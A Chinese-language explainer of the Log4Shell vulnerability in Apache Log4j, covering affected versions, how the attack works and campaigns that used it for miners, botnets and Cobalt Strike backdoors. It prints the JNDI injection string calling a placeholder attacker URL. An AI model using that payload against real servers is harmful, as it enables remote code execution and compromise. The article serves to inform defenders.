Log4Shell Vulnerability

2021 年 12 月 10 日，针对基于 Java 的 Apache Log4j 日志平台中的严重漏洞的漏洞利用发布公开。该漏洞被跟踪为 CVE-2021-44228 或 Log4Shell，影响从 Log4j 2.0-beta9 到 2.14.1 的 Log4j 版本。威胁实施者可以利用漏洞来建立未经身份验证的远程访问、执行代码、传递恶意软件威胁或收集信息。由于 Log4j 被企业应用程序和云服务广泛使用，因此该漏洞被指定为严重状态。

Log4Shell 技术细节

攻击始于威胁参与者更改其 Web 浏览器的用户代理。然后他们访问一个网站或搜索网站上出现的特定字符串，格式如下：

${jndi:ldap://[attacker_URL]}

因此，该字符串将被添加到 Web 服务器的访问日志中。然后攻击者等待 Log4j 应用程序解析这些日志并到达附加的字符串。在这种情况下，错误将触发，导致服务器对 JNDI 字符串中存在的 URL 进行回调。该 URL 被滥用来处理 Base64 编码的命令或 Java 类随后并在受感染的设备上执行它们。

Apache 迅速发布了一个新版本 - Log4j 2.15.0，以解决和修复漏洞，但大量易受攻击的系统可能会在很长一段时间内保持未修补状态。与此同时，攻击者迅速注意到 Log4Shell 零日漏洞并开始扫描合适的服务器以进行利用。信息安全社区已经跟踪了大量使用 Log4Shell 来提供范围广泛的恶意软件威胁的攻击活动。

Log4Shell 用于加密矿工、僵尸网络、后门和数据收集攻击

其中第一个威胁演员的实施Log4Shell在他们的行动是背后的网络犯罪分子Kinsing加密挖掘僵尸网络。黑客使用 Log4Shell 提供 Base64 编码的有效载荷并运行 shell 脚本。这些脚本的作用是在执行自己的 Kinsing 恶意软件之前清除目标系统中的竞争性加密挖掘威胁。

Netlab 360 检测到威胁行为者使用该漏洞在被破坏的设备上安装 Mirai和Muhstik 僵尸网络版本。这些恶意软件威胁旨在将受感染的系统添加到物联网设备和服务器网络中，然后攻击者可以指示这些系统发起 DDoS（分布式拒绝服务）攻击或部署加密矿工随后。

据微软威胁情报中心称，Log4j 漏洞也是投放 Cobalt Strike 信标的攻击活动的目标。 Cobalt Strike 是一种合法的软件工具，用于对公司的安全系统进行渗透测试。然而，它的后门功能使其成为众多威胁组织的武器库中的常见部分。之后，对受害者网络的非法后门访问被用于提供下一阶段的有效载荷，例如勒索软件、信息窃取者和其他恶意软件威胁。

Log4Shell 可用于获取包含服务器数据的环境变量。通过这种方式，攻击者可以访问主机名、操作系统名称、操作系统版本号、运行 Log4j 服务的用户名等。